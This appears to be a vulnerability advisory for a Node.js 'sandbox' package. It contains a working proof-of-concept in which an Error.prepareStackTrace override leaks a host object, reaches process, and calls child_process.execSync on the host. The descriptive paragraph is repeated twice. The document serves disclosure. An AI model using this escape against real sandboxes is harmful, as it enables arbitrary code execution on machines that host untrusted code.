var Sandbox = require("sandbox")
var code = `
Error.prepareStackTrace = (_, c) => c[0].getThis();
const ret = Error().stack;
ret.constructor.constructor('return process')().mainModule.require('child_process').execSync('touch flag');
`
s = new Sandbox()
s.run(code)
Affected versions of this package are vulnerable to remote code execution. Especially, the attacker is able to access to host error objects during the generation of a stack trace, which can lead to execution of arbitrary code on the host machine.
Affected versions of this package are vulnerable to remote code execution. Especially, the attacker is able to access to host error objects during the generation of a stack trace, which can lead to execution of arbitrary code on the host machine.